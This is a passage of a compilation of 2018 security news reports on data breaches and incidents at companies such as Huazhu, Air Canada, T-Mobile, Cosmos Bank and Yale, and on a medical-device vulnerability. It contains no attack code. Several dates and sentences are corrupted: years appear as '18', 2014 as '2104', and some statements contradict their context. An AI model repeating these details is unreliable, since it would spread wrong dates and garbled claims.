“In a conversation with TecMundo, Joshua said that four million orders are exposed – Joshua says that “probably” there are data from two million different customers, considering more than one request per customer. Directly in the present card system, with their numbers, are exposed the data of 36 thousand.” reported TecMundo.

C&A

According to Brazilian newspaper ‘O Globo,’ the Public Ministry of the Federal District and Territories (MPDFT) has launched an investigation on the data breach fearing that data from 2 million customers of C&A were leaked online.

The company confirmed to have detected the incident last week and immediately started the incident response procedures, it also reported the intrusion to the authorities.

C&A highlighted that it doesn’t use personal data for any unauthorized purposes.

“we reiterate our commitment to ethics and respect to the laws and that we work to offer the best possible experience to our customers, and that includes the online environment.” added C&A.


China Probes Suspected Customer Data Leak at Accor Partner
30.8.18 securityweek Incindent

Shanghai police said they were investigating a suspected data leak at NASDAQ-listed Chinese hotelier Huazhu Group, the local partner of France-based AccorHotels.

Huazhu, one of China’s biggest hoteliers, released a statement on Tuesday saying it had alerted police to reports that the company's internal data was being sold online, asking them to investigate.

Chinese media reports said the data included guest membership information, personal IDs, check-in records, guest names, mobile numbers, and emails.

Police in Shanghai said in a statement that they were looking into the case.

Huazhu's website said it operates more than 3,000 hotels in more than 370 cities in China, including the AccorHotels brands Ibis and Mercure.

Shanghai-based Huazhu formed a long-term alliance with Accor in 2014 to help the French hotel group develop the Chinese market.

Huazhu said the release of the data had caused a "vicious impact", without giving specifics, and that it was conducting an internal investigation.

The sale of personal information is common in China, which last year implemented a controversial cybersecurity law that requires services to store user data in China and receive approval from users before sharing their details.

Chinese e-commerce giant Alibaba came under fire earlier this year over its handling of user data in an episode that underscores growing concerns for privacy in the hyper-digitised country.

Alibaba's online-payments affiliate Ant Financial was forced to apologise after users said they felt misled into allowing its Alipay service to share data on their spending habits with Ant's credit-scoring arm and other third-party services.


4-year old Misfortune Cookie vulnerability threatens Capsule Technologies medical gateway device
30.8.18 securityaffairs Incindent

The Misfortune Cookie flaw is threatening medical equipment that connects bedside devices to the hospital’s network infrastructure.
In December 2104, researchers at Check Point Software Technologies discovered the Misfortune Cookie vulnerability, a flaw that was affecting millions of devices running an embedded web server called RomPager, the vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.

An attacker that is able to compromise a vulnerable device like a home router could use it as an entry point in a target network and hack other devices.

Four years later, the Misfortune Cookie vulnerability is still threatening devices worldwide, in particular, medical equipment that connects bedside devices to the hospital’s network infrastructure.

Researchers from security firm CyberMDX discovered that flawed versions of RomPager (4.01 through 4.34 ) ran on different variants of Capsule Datacatptor Terminal Server (DTS) included in medical device information system.

The gateway device connects bedside equipment (anesthesia and infusion pumps, respirators and IoT products) to the network.

“CyberMDX discovered a previously undocumented vulnerability in the device, noting that Qualcomm Life’s Capsule Datacaptor Terminal Server (a medical device gateway) is exposed to the “misfortune cookie” CVE-2014-9222. This opens the possibility for remote arbitrary memory write, which can lead to unauthorized login and code execution.” reads the security advisory published by the company.

Experts warn that modifying the configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device. The attacker can exploit the flaw to steal the patient’s sensitive information.

“Altering the availability and/or configuration of the Capsule Datacaptor Terminal Server directly influences the connectivity of the medical device and allows spoofing communication to and/or from the medical device. In other words — when patient’s sensitive information is sent from a medical device it can be leaked and spoofed by an attacker in this situation.” continues the report.

The bad news is that an exploit code for this flaw is available online.

Misfortune Cookie

The US ICS-CERT issued an alert for the vulnerability, the flaw tracked as CVE-2014-9222 received a severity score of 9.8 out of 10

“This vulnerability allows an attacker to send a specially crafted HTTP cookie to the web management portal to write arbitrary data to the device memory, which may allow remote code execution,” states the ICS-CERT.

Qualcomm Life Capsule Technologies has released a security patch to address the vulnerability, but it only works for the Single Board variant of the DTS, from 2009, instead, it is not possible to use it on The Dual Board, Capsule Digi Connect ES and Capsule Digi Connect ES converted to DTS.

Administrators of the products that cannot be updated should disable the embedded server as mitigation, the webserver, in fact, is only utilized for configuration during the initial deployment and is not necessary for remote support of the device.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Below the recomendations included in the ICS-CERT alert:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.


Data of 130 Million hotel chain guests offered for 8 BTC on Dark Web
30.8.18 securityaffairs Incindent

A hacker is offering for sale the personal details of over 130 million hotel chain guests on a Chinese Dark Web forum.
The news was reported by Bleeping computers, a hacker is selling the personal details of over 130 million hotel guests for 8 Bitcoin on a Chinese Dark Web forum.

“The breach was reported today by Chinese media after several cyber-security firms spotted the forum ad [1, 2, 3, 4].” states Bleeping Computer.

The price for the huge trove of data is 8 Bitcoin (roughly $49,000), it includes official website registration information (ID card number, mobile phone number, email address, login password); check-in registration information (customer name, ID card number, home address, birthday), and booking information (name, card number, mobile phone number, check-in time, departure time, hotel ID number, room number).

The offer was noticed by several cyber-security firms, the hacker claims to have obtained the data from Huazhu Hotels Group Ltd, one of biggest Chinese hotel chains that operate 13 hotel brands across 5,162 hotels in 1,119 Chinese cities.

The stolen data appears to be related to guests who stayed at any of Huazhu’s hotel brands (Hanting Hotel, Grand Mercure, Joye, Manxin, Novotel, Mercure, CitiGo, Orange, All Season, Starway, Ibis, Elan, Haiyou).

The ad published by the seller states the stolen data is included in an archive of 141.5 GB that contains 240 million records, with information on roughly 130 million hotel guests that stayed at one of Huazhu hotels.

Chinese hotel chain dark web

On August 28th, the China Lodging Group issued a statement on the Weibo platform announcing that the group has launched an internal investigation, the Chinese hotel chain also reported the incident to the authorities.

According to the Chinese cyber-security firm Zibao data are authentic and the incident likely occurred early August.

Zibao experts believe the data are related to a new is data leak and are not collected from previous data breaches, instead, it appears to be linked to a mistake of a Huazhu’s programmer that uploaded it on GitHub.

“Zibao Technology believes that this batch of data is suspected to be leaked by a Chinese-speaking company programmer who uploaded to GitHub 20 days ago using a database connection.” reads bjnews.com.cn.


Air Canada data breach – 20,000 users of its mobile app affected
30.8.18 securityaffairs Incindent

Air Canada data breach – The incident was confirmed by the company and may have affected 20,000 customers (1%) of its 1.7 million mobile app users.
The data breach of the day is the one suffered by Air Canada that may have affected 20,000 customers (1%) of its 1.7 million mobile app users.

The news was confirmed by Air Canada that revealed to have detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 18, it added that financial data was protected but invited to remain vigilant for fraudulent credit card transactions.

“We detected unusual login behaviour with Air Canada’s mobile App between Aug. 22-24, 18. We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data.” reads the data breach notification.

“Your credit card information is protected. Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards. As a best practice, customers should always monitor their transactions and credit rating carefully and contact their financial services provider immediately if they become aware of any unusual or unauthorized activities.”

The company has asked Mobile+ app users to reset their accounts as a security precaution. Air Canada contacted potentially affected customers by email to notify the data breach.

Air Canada immediately took action to lock out unauthorized attempts and implemented additional security measures to protect its mobile users.

The most disconcerting aspect of the Air Canada data breach is that attackers may gave accessed additional data including customer’s passport number, passport expiration date, passport country of issuance and country of residence, Aeroplan number, known traveler number, NEXUS number, gender, date of birth, and nationality.

All this data could have been saved in their profile section of the Air Canada mobile app.
air canada data breach

At the time it is still unclear the root cause of the Air Canada data breach, the company urges users to reset their passwords.

All 1.7 million accounts have been temporarily locked until the customers change their passwords.


Personal details of 37,000 Eir customers exposed after the theft of a laptop
26.8.18 securityaffairs Incindent

Personal details of 37,000 Eir customers exposed after the theft of a laptop, including names, email addresses, phone numbers and account numbers.
Eir, the fixed, mobile and broadband telecommunications company of Ireland, has suffered a data breach this week.

Personal details of 37,000 Eir customers have been exposed according to the telecommunications company.

The root cause of the data leak is the theft offsite of an unencrypted laptop containing the customers’ data. Exposed records include names, email addresses, phone numbers and Eir account numbers.

“eir has reported a data breach of personal details for up to 37,000 customers to the Data Protection Commissioner. The data consists of names, email addresses, phone numbers and eir account numbers.” states the data breach notification published by the company on its official website.

“This is a result of the theft of one laptop, which was stolen off premises. No other personal or financial data relating to customers was stored on the laptop in question.”

According to the company, no financial data was exposed.

eir

The telco company reported the incident to the Data Protection Commissioner and to gardaí, the good news for the customers is that the stolen information has been used by a third party in a targeted attack.

“Eir treats privacy and protection of all data extremely seriously and our policy is that all company laptops should be encrypted as well as a password protected,” it said.

“In this case the laptop had been decrypted by a faulty security update the previous working day, which had affected a subset of our laptops and was subsequently resolved.”

Eir is notifying the incident to the affected customers.


The restaurant chain Cheddar’s Scratch Kitchen has suffered a payment card breach
25.8.18 securityaffairs Incindent

The restaurant chain Cheddar’s Scratch Kitchen suffered a payment card breach, hackers hacked the company network between Nov. 3, 2017 and Jan. 2, 18
Once again here we are to discuss of a data breach suffered by a restaurant chain this time the victim is Cheddar’s Scratch Kitchen.

The news has been confirmed by the company that was informed of the data breach this month.

Attackers breached into the company network between Nov. 3, 2017 and Jan. 2, 18 and stole customer payment card data.

“Cheddar’s Scratch Kitchen restaurants have been the victims of cyberattacks, which may have resulted in unauthorized access to or acquisition of your payment card information.” reads the data breach notification.

“On August 16, 18, Cheddar’s Scratch Kitchen (a concept acquired by Darden Restaurants in 2017) learned that between November 3, 2017 and January 2, 18, an unauthorized person or persons gained access to the Cheddar’s Scratch Kitchen network and were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants.”

Restaurants affected by the security breach are in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.

Cheddarâ??s Scratch Kitchen

Cheddar’s Scratch Kitchen hired a third-party cybersecurity firm to investigate the security breach, the investigation is still ongoing It seems that hackers compromised a network that was permanently disabled and replaced by April 10, 18, current systems and networks were not impacted by this incident.

“The unauthorized access appears to have occurred on a network that was permanently disabled and replaced by April 10, 18.” continues the notification.

“It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems.”

The company is recommending customers to enrol in the identity protection services they are providing. Customers must remain vigilant and take steps to themselves from identity theft by reviewing your account statements and by checking your credit report from one or more of the national credit reporting agencies periodically.

The company is offering a free annual credit report from each of the nationwide credit reporting companies—Equifax, Experian, and TransUnion.


Half a Million Cards Exposed in Cheddar's Scratch Kitchen Breach
24.8.18 securityweek Incindent

Over half a million payment card numbers were exposed after cybercriminals compromised the point-of-sale system of certain Cheddar's Scratch Kitchen restaurants, Darden Restaurants announced.

Previously known as Cheddar's Casual Café and based in Irving, Texas, Cheddar's Scratch Kitchen was founded in 1979 and had more than 163 locations in 23 states as of 2016. Darden acquired the concept in 2017.

In a notice published this week, Darden revealed that it learned of the data breach on August 16, 18, from federal authorities. The compromised system, the company says, was a legacy point-of-sale system used in certain restaurant locations.

The incident might have impacted the payment card information of guests who visited the affected Cheddar's restaurants between Nov. 3, 2017 and Jan. 2, 18. A total of 567,000 payment card numbers are believed to have been compromised.

The data breach impacted Cheddar's restaurants located in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia and Wisconsin.

The company says that it has engaged a third-party forensic cybersecurity firm to investigate the incident and that its current systems and networks were not impacted. The legacy system that was compromised has “was permanently disabled and replaced by April 10, 18, as part of our integration process,” the company says.

Cheddar's isn’t the only restaurants chain to have a payment card breach this year. Malware at Chili’s restaurants collected customer card information in March and April, Brinker, which operates over 1,600 Chili’s and Maggiano’s restaurants, revealed in May.

In March, RMH Franchise Holdings revealed that over 160 Applebee’s restaurants were impacted by point-of-sale (PoS) malware that could collect names, credit or debit card numbers, expiration dates, and card verification codes.


T-Mobile data breach exposed personal information of up to 2 million customers
24.8.18 securityaffairs Incindent

T-Mobile today announced It has suffered a security breach that May have exposed personal information of up to 2 million T-mobile customers.
According to the telco giant, the incident affected its US servers on August 20,
leaked information includes customers’ name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid).
T-Mobile notified the security breach to the affected customers and via SMS message, letter in the mail, or a phone call.
“Our cyber-security team discovered and shut down an unauthorized access to certain information, including yours, and we promptly reported it to authorities. None of your financial data (including credit card information) or social security numbers were involved, and no passwords were compromised” reads the announcement published on the company’s website.
“However, you should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid).”
The Company excluded that the security breach may have exposed financial data such as credit card numbers.

In a blog post published by T-Mobile, the company explained that how its staff has detected and locked out the intruders on Monday, August 20.

At the time T-Mobile did not share details of the hack and did not provide Information on the extension of the incident.

A spokesperson for T-Mobile told Motherboard that the incident affected less than 3 percent of its 77 million customers.
The spokesperson added that the attack was carried out by hackers of “an international group.”
T-Mobile hack
The attackers managed to access T-Mobile servers through an API. The good news is that the API was not designed to provide access to financial data or other sensitive Information.
“We found it quickly and shut it down very fast.” Added the spokesperson.
T-Mobile reported the incident to law enforcement.

“We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,” T-Mobile said. “We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.”

The company is urging customers to contact its customer service through 611 for any information regarding the security breach.


Crooks claim to have stolen 20k customer records from Superdrug cosmetics retailer
21.8.18 securityaffairs Incindent

Hackers claim to have stolen the personal details of almost 20,000 Superdrug customers who shopped online at the cosmetics retailer.
The British Superdrug is the last victim of a security breach, hackers claim to have stolen the personal details of almost 20,000 people who shopped online at the cosmetics retailer.

Hackers accessed customers’ names, addresses and in some cases dates of birth, phone number and points balances.

The company has confirmed the incident, the good news is that hackers did not access payment card details.

Superdrug notified the incident to the customers via email warning of the “possible disclosure of your personal data, but not including your payment card information.”

The hackers contacted the company on Monday evening informing it they had obtained details on approximately 20,000 customers, as a proof of the hack they shared details of 386 of the accounts compromised.

“The hacker shared a number of details with us to try and ‘prove’ he had customer information – we were then able to verify they were Superdrug customers from their email and log-in.” reported the DailyMail citing a spokeswoman for the company.

The hackers likely attempted to blackmail the company to avoid to publicly disclosed the hack.

“The crooks alleged they had “obtained information on approximately 20,000 customers but we have only seen 386,”

Superdrug

@superdrug
To customers who have received an email from us today, this email is genuine. We recommend you follow the steps we outlined.

6:29 PM - Aug 21, 18
565
517 people are talking about this
Twitter Ads info and privacy
“On the evening of the 20th of August, we were contacted by hackers who claimed they had obtained a number of our customers’ online shopping information,” the note from boss Peter Macnab stated.

“There is no evidence that Superdrug’s systems have been compromised. We believe the hacker obtained customers’ email addresses and passwords from other websites and then used those credentials to access accounts on our website.”

superdrug cosmetics

Superdrug tried to downplay the incident, sustaining that the hackers obtained the credentials from third-party data breaches. Crooks exploited the fact people reuse their passwords across various web services.

Anyway, Superdrug customers need to reset the password they use to access to Superdrug.com.

Superdrug reported the issue to the authorities and Action Fraud and it “will be offering them all the information they need for their investigation.”

“We have contacted the Police and Action Fraud (the UK’s national fraud and cyber crime arm) and will be offering them all the information they need for their investigation as we continue to take the responsibility of safeguarding our customers’ data incredibly seriously.” reads the note sent via email to the customers.


Cosmos Bank – Hackers stole Rs 94 crore ($13.5 million) in just in 2 days
17.8.18 securityaffairs Incindent

Cosmos Bank, one of the largest Indian cooperative banks, confirmed it was the victim of a cyberheist, over the weekend hackers stole over 940 million rupees ($13.5 million) in three days.
Hackers stole over 940 million rupees ($13.5 million) in three days from the Indian cooperative Cosmos bank. The Cosmos bank publicly disclosed the attacks in a press conference on Tuesday, according to the financial institution, the hackers stole the funds in three attacks using a malware.

“Hackers managed to siphon off over Rs 94 crore through a malware attack on the server of Pune-based Cosmos Bank and cloning thousands of the bank’s debit cards over a period of two days, a top official said.” reports the economictimes.indiatimes.com.

According to Cosmos Bank chairman Milind Kale, the attack was launched from Canada, but likely the country was used as a relay for the attack.

The first two security breaches occurred on August 11 when hackers withdrew 805 million rupees ($11.4 million) through 14,849 ATM transactions across 28 countries.

“The fraudulent transactions were carried out on August 11 and August 13 and the malware attack by the hackers originated in Canada, Cosmos Bank chairman Milind Kale told reporters here today.”

“In two days, hackers withdrew a total Rs 78 crore from various ATMs in 28 countries, including Canada, Hong Kong and a few ATMs in India, and another Rs 2.5 crore were taken out within India,” he said.

“On August 13, hackers again transferred Rs 13.92 crore in a Hong Kong-based bank by using fraudulent transactions.”

In the first wave of attacks, crooks stole 780 million rupees ($11 million) through 12,000 ATM withdrawals via the VISA card system. Most of the fraudulent transactions were made overseas.

The second wave of attacks was launched two hours later, cybercriminals withdrew an additional 25 million rupees ($400,000) via 2,849 ATM transactions via the Rupay debit card system at ATM locations across India.

The good news is that the Cosmos Bank detected the fraudulent transactions and halted them, but its staff was not able to lock out the attackers.

On Monday, August 13, the hackers launched a third wave of attacks targeting the SWIFT system. Crooks made three fraudulent transactions to a bank account in Hong Kong for a total of Rs 13.92 crore rupees ($1,8 million).

The good news is that money wasn’t stolen from customer accounts, the bank reported the incident to the authorities and it is currently investigating the attacks with the support of a forensic agency.

“On Saturday afternoon, the bank came to know about malware attack on its debit card payment system and it was observed that unusual repeated transactions were taking place through Visa and Rupay cards used at various ATMs for nearly two hours,” Kale added.

Crooks used a “parallel” or proxy switch system while cloning the cards, all the fraudulent payment approvals were passed by this proxy mechanism.

Anyway, Kale confirmed that the core banking system was not affected by the malware attack.


Unsecured AWS S3 Bucket exposed sensitive data on 31,000 GoDaddy servers

12.8.18 securityaffairs Incindent

UpGuard discovered an unsecured GoDaddy’s Amazon S3 bucket containing sensitive information related to more than 31,000 GoDaddy systems.
Experts at cybersecurity firm UpGuard have reported that another big company was victim of a data leak, it is the domain name registrar and web hosting company GoDaddy.

The popular UpGuard’s risk analyst Chris Vickery discovered an unsecured GoDaddy’s Amazon S3 bucket containing sensitive information related to more than 31,000 GoDaddy systems.

“The UpGuard Cyber Risk Team has discovered and secured a data exposure of documents appearing to describe GoDaddy infrastructure running in the Amazon AWS cloud, preventing any future exploitation of this information.” reads the post published by UpGuard.

“The documents were left exposed in a publicly accessible Amazon S3 bucket which, according to a statement from Amazon, “was created by an AWS salesperson.”

The expert discovered the unsecured AWS bucket named abbottgodaddy on June 19th, 18. It was containing several versions of a spreadsheet, the latest one named “GDDY_cloud_master_data_1205 (AWS r10).xlsx.

The document was a 17MB Microsoft Excel file with multiple sheets and tens of thousands of rows.

Each sheet contained data related to the large-scale infrastructure running in the Amazon cloud, such as “high-level configuration information” of company systems and pricing facilities for operating them.

“The exposed configuration information included fields for hostname, operating system, “workload” (what the system was used for), AWS region, memory and CPU specs, and more.” continues the post.

“Essentially, this data mapped a very large scale AWS cloud infrastructure deployment, with 41 different columns on individual systems, as well as summarized and modeled data on totals, averages, and other calculated fields. Also included were what appear to be GoDaddy’s discounts from Amazon AWS, usually restricted information for both parties, who must negotiate for rates– as do GoDaddy’s competitors.”

godaddy data leak

The experts pointed out that the availability of the configuration information for the GoDaddy infrastructure could allow attackers to select targets based on their role, probable data, size, and region.

Competitors, vendors, cloud providers, and others, could also use business data exposed in the unsecured Amazon S3 bucket as a competitive advantage for cloud hosting strategy and pricing.

“From operations as large as GoDaddy and Amazon, to small and medium organizations, anyone who uses cloud technology is subject to the risk of unintentional exposure, if the operational awareness and processes aren’t there to catch and fix misconfigurations when they occur,” concludes UpGuard.

This year many other companies have exposed sensitive data in the same way, including Accenture, FedEx, and Walmart. Even though Amazon S3 buckets are configured by default with a secure configuration, many AWS customers turn off security settings for expedience. This particular data leak was caused by an AWS employee.

“The bucket in question was created by an AWS salesperson to store prospective AWS pricing scenarios while working with a customer,” an Amazon spokesperson said. “No GoDaddy customer information was in the bucket that was exposed. While Amazon S3 is secure by default, and bucket access is locked down to just the account owner and root administrator under default configurations, the salesperson did not follow AWS best practices with this particular bucket.”


GitHub started warning users when adopting compromised credentials
9.8.18 securityaffairs Incindent

In order to improve the security of its users, the popular software code hosting service GitHub is now alerting account holders whenever it detects that a password has been exposed by data breaches on other services.
Last week the popular software code hosting service GitHub has introduced a new feature to protect its users, it will alert them whenever it detects that a password has been compromised in a third-party data breach.

GitHub has teamed with the HaveIBeenPwned.com service, managed by the cybersecurity expert Troy Hunt, to provide implement a feature that allows users to check whether their credentials have been involved in known data breaches.

“Common password advice is to use a long and unique password for each website you have an account with. It’s challenging to remember a strong and unique password for each website without either using a password manager or using a trivially discovered theme. As a result, password reuse is extremely prevalent. Regardless of the strength of a password, a single breach can nullify its security when used elsewhere.” reads the advisory published by GitHub.

“While Troy hosts a service that people and services can use to check for compromised passwords, he also generously made the approximately 517 million record dataset available for download. Using this data, GitHub created an internal version of this service so that we can validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub has developed service that leverages the 517 million record dataset provided by Huntto “validate whether a user’s password has been found in any publicly available sets of breach data.”

GitHub account check

The feature will alert users that are using compromised credentials and ask them to change them during login, registration, or during a password change.

The service will store Github the hashed passwords using the bcrypt algorithm.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” continues GitHub.

GitHub encourages the use of two-factor authentication (2FA), those users that have enabled it will receive periodic warnings to review the 2FA setup and recovery options.

“If you have two-factor authentication enabled, GitHub will now periodically remind you to review your 2FA setup and recovery options. We highly recommend using a 2FA authenticator application that supports cloud backups in the event your phone is lost, stolen, or falls in the ocean.” continues the advisory.

In June, Microsoft announced the acquisition of GitHub for $7.5 billion in Microsoft stock and the hosting service is improving its security by introducing new measures, including the enforcing of SSL/TLS.


GitHub to Warn Users on Compromised Passwords
6.8.18 securityweek  Incindent

In a move to protect its users, software repository site GitHub is now alerting account holders whenever it detects that a password has been compromised in breaches on other services.

Security experts have long pushed for the use of long, unique passwords, to ensure stronger security of all online accounts. However, even unique passwords can pose a great risk when compromised, especially if attackers can link them to specific accounts.

The new feature is the result of a partnership with Troy Hunt, the security researcher behind the popular HaveIBeenPwned.com project. The service allows users to check whether their accounts and passwords have appeared in any data breaches.

An internal tool GitHub has created is now taking advantage of a 517 million record dataset that Hunt made available for download through its service to “validate whether a user’s password has been found in any publicly available sets of breach data.”

The open-source software repository platform enabled the feature last week. The functionality, it says, it meant to alert all people who are using compromised passwords and prompt them to select a different one during login, registration, or when updating their password.

“Don’t worry, your password is protected by the password hashing function bcrypt in our database. We only verify whether your password has been compromised when you provide it to us,” GitHub explains.

Users who have two-factor authentication (2FA) enabled will receive periodic warnings to review the 2FA setup and recovery options, GitHub also reveals.

However, traditional 2FA options such as SMS have proven to be unreliable, and all of the online platform’s users are advised to use a 2FA authenticator application that supports cloud backups, to ensure a recovery option is always available for them.

“These new account security enhancements will help improve the security of your account. We hope you will take this opportunity to review the security of your account. Balancing security, usability, and recoverability is a personal decision,” GitHub notes.

The service’s users are advised to generate strong, unique passwords using a dedicated manager, to enable 2FA, and to make sure an account-recovery method is available. They should also update their primary email address if necessary and review their other credentials on the platform, GitHub says.

GitHub, which will soon become part of Microsoft, has made other security improvements as well, including the enforcing of SSL/TLS. This, however, did not stop hackers from compromising accounts to spread malicious code, as was the case with the recent Gentoo incident.


Global Shipping Firm Clarksons Provides Update on 2017 Breach
3.8.18 securityweek  Incindent

Clarkson PLC (Clarksons), a global shipping services firm, this week provided an update to the breach it suffered between May and November 2017. Little further on the nature of the breach is revealed, other than the extent of the customer personal information that was stolen.

In November 2017, Clarksons revealed that a single compromised user account had allowed attackers to infiltrate their systems, exfiltrate personal data, and demand a ransom for its safe return. Clarkson's declined to pay the ransom, and for some time it was expected that the data might be revealed. "I hope our clients understand that we would not be held to ransom by criminals, and I would like to sincerely apologise for any concern this incident may have understandably raised," said Andi Case, CEO of Clarksons.

In its latest statement (PDF) the firm claims it was able -- with the help of law enforcement and forensic specialists -- to successfully trace and recover the stolen data. It doesn't state -- and probably could not know -- whether the stolen data had been copied before it was recovered. It is nevertheless warning those potentially affected by the incident to, "Remain vigilant against incidents of identity theft and fraud by reviewing personal account statements for suspicious activity and to detect errors."

What is most surprising in this updated information is the extent of personal information that was stored by the company and stolen by the criminals. In full, the statement says,

"While the potentially affected personal information varies by individual, this data may include a date of birth, contact information, criminal conviction information, ethnicity, medical information, religion, login information, signature, tax information, insurance information, informal reference, national insurance number, passport information, social security number, visa/travel information, CV / resume, driver's license/vehicle identification information, seafarer information, bank account information, payment card information, financial information, address information and/or information concerning minors."

There is no mention of whether any of this data was encrypted or hashed. Identity theft, bank fraud and blackmail are the most obvious threats if such data were in the wrong hands.

"In this particular incident, what is honestly shocking is the amount of sensitive data that this single account had access to and I am sure the EU GDPR will be looking closely," comments Joseph Carson, chief security scientist at Thycotic. "If it is found that EU GDPR applies, and Clarkson PLC had failed to apply adequate security, they could be facing a huge financial penalty." Whether GDPR can be invoked will be up to the individual EU regulators. Clarksons claims the intruder had access to its systems from May 31, 2017 until November 4, 2017; which is before GDPR became active on May 25, 18.

Rishi Bhargava, co-founder at Demisto, told SecurityWeek that Clarksons appears to have gone through the mechanics of breach notification conscientiously. "Clarksons seems to have provided updates and apprised affected individuals in a comprehensive and transparent manner," he said. "There are numerous cross-industry regulations to deal with while implementing breach notifications, and the granularity of US state-specific information shared by Clarksons is testament to that."

But he added, "The bigger question to consider is whether Clarksons needed to retain all this personal information in the first place. With GDPR introducing strict regulations for data processing, data consent, explicit need for processing, retention timelines, and deletion, organizations need to rethink their entire ‘data supply chain' if they haven't already. However transparent breach notifications are, they're still a post-breach exercise and need to be matched by operational data discipline in order to truly bring accountability to data processors."

It is possible that the tracing and recovery of the stolen data also implies knowledge of the perpetrator -- he or she may even be in custody. If this is true, it will probably be only through subsequent court documents that we discover exactly how the breach occurred. However, most security experts believe our knowledge so far points to a failure to use multi-factor authentication, and a failure to adequately manage privileged accounts.

Timur Kovalev, CTO at Untangle, told SecurityWeek, "While unfortunate, these sorts of breaches are certainly not uncommon. However, there are steps that organizations can take to mitigate their risk. Requiring multi-factor authentication for user accounts is a rational first step. Additionally, IT departments need to limit access of even properly credentialed users to only those apps and systems that are critical for that person's business use. Finally, companies can reduce the amount of customer data they are storing anywhere on networked systems; GDPR will certainly help accelerate this best practice."

Carson agrees. "The lesson to be learned from this incident is the importance in protecting accounts with privileged access to sensitive data and that those accounts should never use a password as the only security control. Similarly, a single account should never have full access to such a large amount of data -- at least without peer reviews and approval processes."

The question of whether Clarksons had a valid reason to store that amount of highly sensitive personal data remains one for the regulators.


Dixons Carphone Breach: Much Larger Than First Thought
2.8.18 securityweek Incindent

A data breach at Dixons Carphone that was made public last month resulted in 10 million records being accessed by unknown actors, the consumer UK electronics retailer announced Tuesday.

The company initially said that only 1.2 million records containing personal data of its customers, such as name, address or email address, were accessed during the intrusion. They also claimed that the accessed data did not include financial information.

In an update released this week (PDF), the company revealed that hackers were able to access approximately 10 million records containing personal data. The incident happened last year, but no specific details on when or how the intrusion took place were provided.

Although it initially said that the attackers were attempting to access 5.9 million cards and that 105,000 non-EU issued payment cards were indeed compromised, the company now says that the impacted records did not contain payment card details.

“While there is now evidence that some of this data may have left our systems, these records do not contain payment card or bank account details and there is no evidence that any fraud has resulted. We are continuing to keep the relevant authorities updated,” Dixons Carphone said.

The company also announced that it has decided to inform all of its customers of the data breach. The retailer claims that this is only a precaution and that it only apologizes to customers, while advising them of available protective steps they could take to minimize the risk of fraud.

“As we indicated previously, we have taken action to close off this access and have no evidence it is continuing,” the company said.


Yale University Discloses Decade-Old Data Breach
2.8.18 securityweek Incindent

"Because the intrusion happened nearly ten years ago, we do not have much more information about how it occurred."

Yale University revealed that hackers accessed one of its databases between 2008 and 2009 and accessed the personal information of 119,000 people.

The intrusion happened between April 2008 and January 2009 and apparently affected a single database stored on a Yale server. The data breach was discovered on June 16, 18, during a security review. The attackers extracted names, Social Security numbers, and, in almost all cases, dates of birth. In many cases, Yale email addresses were also extracted, and in some cases the physical addresses of individuals associated with the university were compromised as well.

According to Yale, no financial information was stored in the database and almost all people impacted by the breach were affiliated with the university.

“In 2011, Yale IT deleted the personal information in the database as part of an effort to eliminate unneeded personal information on Yale servers, but the intrusion was not detected at that time,” the university says.

Last week, Yale sent notices of the data breach to impacted members of the Yale community, including alumni/ae, faculty members, and staff members. The university says notices were sent to nearly 97% of the individuals affected, but that it has yet to acquire a verified current address for the remaining 3%.

In a letter (PDF) to the State of New Hampshire Attorney General, Yale also revealed that the same server was hacked a second time between March 2016 and June 18. The intrusion resulted in the compromise of the names and Social Security numbers of 33 individuals, none of whom reside in New Hampshire.

Yale claims that there is no indication that the compromised information has been misused. However, it decided to offer identity monitoring services at no cost, to help users guard against identity theft.

Because the intrusion occurred a decade ago, there is no information on how the attackers hacked the server. Yale also says that “it is not feasible to determine the identities of the perpetrators.”


Ten years ago someone breached into a server of the Yale University
2.8.18 securityweek Incindent

Ten years ago someone breached into a server of the Yale University, but because the intrusion happened nearly ten years ago there is much more information about how it occurred.
After ten years, Yale University revealed a security breach that exposed an archive containing personal information of 119,000 people.

Hackers breached into the database of the famous University between April 2008 and January 2009 and apparently accessed a server where it is hosted a single database.

“On July 26th and 27th, Yale mailed notices to members of the Yale community, including alumni/ae, faculty members, and staff members, who were affected by a data intrusion that occurred in 2008-2009.” reads the security alert published by the Yale University.

yale university

The database contained data of individuals affiliated with the university, the unauthorized access was discovered on June 16, 18, during a security review.

The hackers accessed names, Social Security numbers, dates of birth, Yale email addresses, and in some cases the physical addresses of individuals associated with the university.

Unfortunately, there is no way to understand how attackers hacked the server either “it is not feasible to determine the identities of the perpetrators.”

The academic institution announced that no financial information was exposed, it sent a notice letter to 97% of affected people in the Yale community.

